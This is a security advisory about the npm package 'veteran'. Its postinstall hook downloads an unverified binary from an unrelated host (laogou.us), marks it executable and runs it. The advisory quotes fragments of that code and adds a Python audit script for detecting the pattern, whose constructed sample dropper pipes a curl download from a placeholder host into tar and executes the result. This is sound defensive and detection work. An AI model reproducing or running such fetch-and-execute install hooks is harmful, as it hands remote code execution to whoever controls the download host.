
MAL-2026-4703

Malicious code in veteran (npm)

Details

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (70a20dd9f8d6a9df01d766c25693711d90e4303e3c68fa371f0b842f83c485b4)

On `npm install`, the package's postinstall hook (`install.js`, registered via `package.json` line 10 `"postinstall": "node install.js"`):

- downloads a platform-specific executable from `https://laogou.us/download/veteran/v1.0.0/veteran_1.0.0_<platform>_<arch>.{tar.gz,zip}` (install.js:13 `const DOWNLOAD_BASE_URL = 'https://laogou.us/download/veteran'`),
- extracts it via shell `tar`/`unzip`,
- `chmod 0o755`s it (install.js:165), and
- immediately executes it (install.js:170 `execSync("${BIN_PATH}" version",...)`).

The download host `laogou.us` does not match the package's declared publisher/homepage (`github.com/yongjie0203/veteran`); the URL is not version-pinned to a hash or signature; no checksum or signature verification is performed on the fetched bytes; and source comments suggest the URL is meant to be swapped by future maintainers. The operator of `laogou.us` can therefore serve arbitrary native code to every installer, with the bytes executed under the installer's user on `npm install`. This matches the publisher-mismatched, unverified, mutable-host dropper pattern.
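The pattern above (a lifecycle hook that fetches from a host unrelated to the declared publisher, verifies nothing, then marks the file executable and runs it) can be flagged before a package is allowed into a build. The following audit script is an added example for this advisory, not code from the veteran package or from amazon-inspector; it takes a parsed `package.json` plus the source of the scripts it references and reports each signal separately, so the same check also catches partial variants of the pattern. The `package.json` and `install.js` inputs are constructed stand-ins with placeholder hosts, not the contents of the malicious package.

```python
"""Heuristic audit of npm lifecycle hooks for the unverified-dropper pattern.

Added example for this advisory, not part of the veteran package or of any
scanner's code. Inputs are constructed stand-ins; hosts are placeholders.
"""
import json
import re
from urllib.parse import urlparse

LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall")
URL_RE = re.compile(r"https?://[^\s'\"`)]+")
EXEC_RE = re.compile(r"\b(execSync|exec|spawnSync|spawn|execFileSync|execFile)\s*\(")
VERIFY_RE = re.compile(r"createHash|sha256|sha512|integrity|signature|verify", re.I)
CHMOD_RE = re.compile(r"chmod(Sync)?\s*\(")


def host_of(url):
    """Normalised hostname of a URL ('' when it has none)."""
    return (urlparse(url).hostname or "").lower().removeprefix("www.")


def publisher_hosts(pkg):
    """Hosts the package itself declares: homepage and repository URL."""
    hosts = set()
    if pkg.get("homepage"):
        hosts.add(host_of(pkg["homepage"]))
    repo = pkg.get("repository")
    if isinstance(repo, dict):
        repo = repo.get("url")
    if isinstance(repo, str):
        repo = re.sub(r"^git\+", "", repo)  # "git+https://..." -> "https://..."
        if "://" in repo:
            hosts.add(host_of(repo))
    hosts.discard("")
    return hosts


def audit_package(pkg, scripts):
    """pkg: parsed package.json; scripts: {filename: source}. Returns findings."""
    findings = []
    pub = publisher_hosts(pkg)
    for hook in LIFECYCLE_HOOKS:
        cmd = pkg.get("scripts", {}).get(hook)
        if not cmd:
            continue
        # Resolve the script file the hook runs, e.g. "node install.js".
        m = re.search(r"\b([\w./-]+\.[cm]?js)\b", cmd)
        src = scripts.get(m.group(1)) if m else None
        if src is None:
            findings.append(f"{hook}: runs {cmd!r} but its script is not in the package")
            continue
        urls = URL_RE.findall(src)
        for url in urls:
            host = host_of(url)
            if host and host not in pub:
                findings.append(f"{hook}: downloads from {host}, not a publisher host {sorted(pub)}")
        if urls and not VERIFY_RE.search(src):
            findings.append(f"{hook}: fetches remote content with no checksum/signature check")
        if EXEC_RE.search(src):
            findings.append(f"{hook}: executes a child process")
        if CHMOD_RE.search(src):
            findings.append(f"{hook}: marks a file executable")
    return findings


def is_dropper_like(findings):
    """True when foreign host, no verification and execution all co-occur."""
    text = "\n".join(findings)
    return all(s in text for s in ("not a publisher host", "no checksum", "child process"))


# Constructed sample inputs (placeholder names and hosts, not the real package).
SAMPLE_PACKAGE_JSON = json.loads("""{
  "name": "example-cli", "version": "1.0.0",
  "homepage": "https://github.com/example-org/example-cli",
  "repository": {"type": "git", "url": "git+https://github.com/example-org/example-cli.git"},
  "scripts": {"postinstall": "node install.js"}
}""")

DROPPER_INSTALL_JS = """
const { execSync } = require('child_process');
const fs = require('fs');
const DOWNLOAD_BASE_URL = 'https://cdn.unrelated-host.test/download/example-cli';
const url = `${DOWNLOAD_BASE_URL}/v1.0.0/example-cli_${process.platform}_${process.arch}.tar.gz`;
execSync(`curl -sSL ${url} | tar -xz -C ./bin`);
fs.chmodSync('./bin/example-cli', 0o755);
execSync('./bin/example-cli version');
"""

HARDENED_INSTALL_JS = """
const https = require('https'); const crypto = require('crypto'); const fs = require('fs');
const RELEASE_URL = 'https://github.com/example-org/example-cli/releases/download/v1.0.0/example-cli.tar.gz';
const EXPECTED_SHA256 = 'PINNED_DIGEST_PLACEHOLDER';
https.get(RELEASE_URL, res => {
  const hash = crypto.createHash('sha256'); const chunks = [];
  res.on('data', c => { hash.update(c); chunks.push(c); });
  res.on('end', () => {
    if (hash.digest('hex') !== EXPECTED_SHA256) throw new Error('digest mismatch');
    fs.writeFileSync('./bin/example-cli.tar.gz', Buffer.concat(chunks));
  });
});
"""

if __name__ == "__main__":
    for label, src in (("dropper", DROPPER_INSTALL_JS), ("hardened", HARDENED_INSTALL_JS)):
        result = audit_package(SAMPLE_PACKAGE_JSON, {"install.js": src})
        print(label, "dropper-like" if is_dropper_like(result) else "ok", result)
```

The checks are deliberately independent: a publisher-host download with a pinned digest (the hardened sample) yields no findings, while a foreign host alone, or a fetch with no verification alone, still surfaces as a single lower-severity line for a reviewer to weigh. In a registry proxy or CI gate, the same function can be run over every package with a lifecycle script before `npm install` is allowed to execute it.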


Affected packages

npm / veteran

No fixed version published yet for veteran (npm). Pin to a known-safe version or switch to an alternative.
